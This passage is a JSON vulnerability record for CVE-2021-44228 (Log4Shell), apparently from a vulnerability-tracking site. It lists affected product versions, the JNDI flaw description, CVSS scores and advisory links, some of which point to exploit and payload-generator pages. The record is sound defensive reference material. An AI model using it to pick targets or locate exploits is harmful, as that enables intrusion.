"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.001.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:007.000.001:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.000:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.005.000.:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:connected_analytics_for_network_deployment:006.004.000.003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:4.1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:4.1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:3.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:crosswork_network_automation:2.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.010\\(000.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.002\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(001.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.002\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.001\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:cisco:common_services_platform_collector:002.009\\(000.000\\):*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:snowsoftware:vm_access_proxy:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.6",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:snowsoftware:snow_commander:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "8.10.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:bentley:synchro_4d:*:*:*:*:pro:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.2.4.2",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:bentley:synchro:*:*:*:*:pro:*:*:*",
"cpe_name": [],
"versionEndExcluding": "6.4.3.2",
"versionStartIncluding": "6.1",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:percussion:rhythmyx:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.3.2",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-44228"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-400"
},
{
"lang": "en",
"value": "CWE-502"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://logging.apache.org/log4j/2.x/security.html",
"refsource": "MISC",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"name": "[oss-security] 20211210 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Mitigation",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Mitigation",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"name": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "https://security.netapp.com/advisory/ntap-20211210-0007/",
"refsource": "CONFIRM",
"tags": [
"Vendor Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"name": "20211210 Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021",
"refsource": "CISCO",
"tags": [
"Third Party Advisory"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "[oss-security] 20211210 Re: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"name": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"
},
{
"name": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"name": "FEDORA-2021-f0f501d01f",
"refsource": "FEDORA",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/"
},
{
"name": "[oss-security] 20211213 CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"name": "[oss-security] 20211213 Re: CVE-2021-4104: Deserialization of untrusted data in JMSAppender in Apache Log4j 1.2",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"name": "https://twitter.com/kurtseifried/status/1469345530182455296",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"name": "[debian-lts-announce] 20211212 [SECURITY] [DLA 2842-1] apache-log4j2 security update",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"name": "DSA-5020",
"refsource": "DEBIAN",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"
},
{
"name": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"
},
{
"name": "[oss-security] 20211214 CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"name": "VU#930724",
"refsource": "CERT-VN",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"name": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"
},
{
"name": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"
},
{
"name": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"
},
{
"name": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"
},
{
"name": "[oss-security] 20211215 Re: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack",
"refsource": "MLIST",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"name": "Microsoft\u2019s Response to CVE-2021-44228 Apache Log4j 2",
"refsource": "MS",
"tags": [
"Patch",
"Third Party Advisory",
"Vendor Advisory"
],
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"name": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
],
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html"
},
{
"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"name": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html"
},
{
"name": "FEDORA-2021-66d6c484f3",
"refsource": "FEDORA",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/"
},
{
"name": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md",
"refsource": "MISC",
"tags": [
"Product",
"US Government Resource"
],
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md"
},
{
"name": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html"
},
{
"name": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html"
},
{
"name": "https://www.oracle.com/security-alerts/cpujan2022.html",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"name": "https://github.com/cisagov/log4j-affected-db",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"name": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001",
"refsource": "MISC",
"tags": [
"Third Party Advisory"
],
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"name": "https://support.apple.com/kb/HT213189",
"refsource": "CONFIRM",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT213189"
},
{
"name": "20220314 APPLE-SA-2022-03-14-7 Xcode 13.3",
"refsource": "FULLDISC",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2022/Mar/23"
},
{
"name": "https://www.oracle.com/security-alerts/cpuapr2022.html",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"name": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228"
},
{
"name": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"name": "20220721 Open-Xchange Security Advisory 2022-07-21",
"refsource": "FULLDISC",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2022/Jul/11"
},
{
"name": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html",
"refsource": "MISC",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"
},
{
"name": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html"
},
{
"name": "20221208 Intel Data Center Manager \u003c= 5.1 Local Privileges Escalation",
"refsource": "FULLDISC",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2022/Dec/2"
},
{
"name": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html",
"refsource": "MISC",
"tags": [],
"url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html"
}
]
}
},
"impact": {
"baseMetricV2": {
"acInsufInfo": false,
"cvssV2": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"userInteractionRequired": false
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6.0
}
},
"lastModifiedDate": "2023-04-03T20:15Z",
"publishedDate": "2021-12-10T10:15Z"
}
}
}
Loading...
Loading...
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.